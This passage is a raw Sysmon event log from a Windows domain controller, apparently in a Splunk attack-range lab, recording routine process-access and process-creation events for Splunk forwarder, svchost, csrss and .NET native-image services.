.dll+51791 10341000x80000000000000007346Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:15.879{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45FF-6000-3D03-000000009A01}4916C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007345Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:15.879{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-45FF-6000-3D03-000000009A01}4916C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007344Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:15.879{08A6967A-45FF-6000-3D03-000000009A01}4916C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x80000000000000007343Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:24:15.738{08A6967A-45FB-6000-3B03-000000009A01}2432C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\980-0\System.Core.dll2021-01-14 13:24:15.738 10341000x80000000000000007342Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:15.207{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-45FF-6000-3C03-000000009A01}4388C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007341Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:15.207{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007340Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:15.207{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007339Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:15.207{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007338Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:15.207{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007337Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:15.207{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007336Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:15.207{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007335Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:15.207{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007334Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:15.207{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007333Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:15.207{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007332Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:15.207{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45FF-6000-3C03-000000009A01}4388C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007331Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:15.207{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-45FF-6000-3C03-000000009A01}4388C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007330Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:15.207{08A6967A-45FF-6000-3C03-000000009A01}4388C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007380Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:16.754{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4600-6000-4103-000000009A01}4872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007379Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:16.738{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4600-6000-4103-000000009A01}4872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007378Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:16.738{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4600-6000-4103-000000009A01}4872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007377Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:16.675{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4600-6000-4003-000000009A01}4716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007376Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:16.660{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4600-6000-4003-000000009A01}4716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007375Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:16.660{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4600-6000-4003-000000009A01}4716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007374Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:16.550{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4600-6000-3F03-000000009A01}3888C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007373Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:16.550{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007372Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:16.550{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007371Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:16.550{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007370Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 